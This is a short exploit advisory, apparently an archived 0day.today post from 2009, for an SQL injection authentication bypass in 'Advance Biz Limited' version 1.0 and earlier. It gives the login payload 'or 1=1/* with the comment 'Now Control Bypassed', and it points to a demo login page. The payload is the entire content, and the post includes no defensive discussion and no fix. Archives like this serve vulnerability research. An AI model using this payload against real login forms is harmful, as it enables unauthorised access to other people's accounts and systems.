id: 10346
date: 12/20/2009
title: Advance Biz Limited <= 1.0 ( Auth Bypass ) SQL injection Vulnerability
author: PaL-D3v1L
cves: 

======================================================================
Advance Biz Limited <= 1.0 ( Auth Bypass ) SQL injection Vulnerability
======================================================================

################################################## #########################
 
==[ SQL injection ]==
 
Write This Code : 'or 1=1/* <======= Now Control Bypassed
 
 
==[ Live Demo ]==
 
http://server/advance-biz/demo/login.php
 
 
################################################## ######################### 



#  0day.today [2023-03-25]  #